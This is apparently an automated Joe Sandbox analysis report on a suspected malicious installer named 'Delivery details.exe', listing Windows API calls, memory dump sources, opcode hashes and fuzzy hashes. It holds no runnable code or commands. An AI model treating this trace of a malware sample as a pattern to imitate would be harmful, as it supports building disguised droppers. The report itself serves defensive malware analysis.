                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                  • String ID: : Completed$N$YD@
                                                                  • API String ID: 3103080414-1273182181
                                                                  • Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                  • Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
                                                                  • Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                  • Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                  • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                  • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                  • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
                                                                  • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
                                                                    • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                    • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                  • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
                                                                  • wsprintfA.USER32 ref: 0040607B
                                                                  • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
                                                                  • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406164
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
                                                                    • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
                                                                    • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                  • String ID: %ls=%ls$[Rename]
                                                                  • API String ID: 2171350718-461813615
                                                                  • Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                  • Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
                                                                  • Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                  • Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\Delivery details.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-684569964
                                                                  • Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                  • Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
                                                                  • Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                  • Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004043C9
                                                                  • GetSysColor.USER32(00000000), ref: 004043E5
                                                                  • SetTextColor.GDI32(?,00000000), ref: 004043F1
                                                                  • SetBkMode.GDI32(?,?), ref: 004043FD
                                                                  • GetSysColor.USER32(?), ref: 00404410
                                                                  • SetBkColor.GDI32(?,?), ref: 00404420
                                                                  • DeleteObject.GDI32(?), ref: 0040443A
                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404444
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                  • Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
                                                                  • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                  • Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                    • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                  • String ID: 9
                                                                  • API String ID: 163830602-2366072709
                                                                  • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                  • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                                  • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                  • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
                                                                  • GetTickCount.KERNEL32 ref: 00402EAB
                                                                  • wsprintfW.USER32 ref: 00402ED9
                                                                    • Part of subcall function 00405414: lstrlenW.KERNEL32(driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                    • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                    • Part of subcall function 00405414: lstrcatW.KERNEL32(driftsresultaters,00402EEC), ref: 0040546F
                                                                    • Part of subcall function 00405414: SetWindowTextW.USER32(driftsresultaters,driftsresultaters), ref: 00405481
                                                                    • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                    • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                    • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402F0B
                                                                    • Part of subcall function 00402E56: MulDiv.KERNEL32(0006EBB1,00000064,0007376C), ref: 00402E6B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 722711167-2449383134
                                                                  • Opcode ID: b1d83868f06c61a0afcbd0f0ce3e66c9248e0a33da805beecb11655fb503df53
                                                                  • Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
                                                                  • Opcode Fuzzy Hash: b1d83868f06c61a0afcbd0f0ce3e66c9248e0a33da805beecb11655fb503df53
                                                                  • Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
                                                                  • GetMessagePos.USER32 ref: 00404D01
                                                                  • ScreenToClient.USER32(?,?), ref: 00404D1B
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                  • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                  • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                  • wsprintfW.USER32 ref: 00402E29
                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E39
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                  • API String ID: 1451636040-1158693248
                                                                  • Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                  • Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
                                                                  • Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                  • Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                  • GlobalFree.KERNEL32(?), ref: 00402950
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                  • Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
                                                                  • Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                  • Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                  • wsprintfW.USER32 ref: 00404C7A
                                                                  • SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
